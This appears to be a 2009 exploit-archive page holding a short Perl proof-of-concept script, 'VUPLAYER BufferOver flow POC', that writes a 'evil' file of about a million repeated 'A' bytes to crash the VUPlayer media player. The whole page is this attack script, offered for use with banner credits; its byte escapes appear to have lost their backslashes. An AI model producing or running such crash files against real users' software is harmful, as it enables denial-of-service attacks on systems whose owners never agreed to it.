Home / os / win10

vuplayer-dos.txt

Posted on 07 January 2009

#!/usr/bin/perl system("color 3"); if (@ARGV != 1) { &help; exit(); } sub help(){ print "[X] Usage : ./exploit.pl filename "; } { $file = $ARGV[0]; } print " [X]******************************************* "; print " [X] VUPLAYER BufferOver flow POC * "; print " [X] Coded By AlpHaNiX * "; print " [X] From Null Area * "; print " [X]******************************************* "; print "[+] Exploiting..... " ; my $buff="x41x41x41x41" x 1000000 ; print "[+] Creating Evil File" ; open($FILE, ">>$file") or die "Cannot open $file"; print $FILE $buff; close($FILE); print " [+] Please wait while creating $file"; print " [+] $file has been created";

 

TOP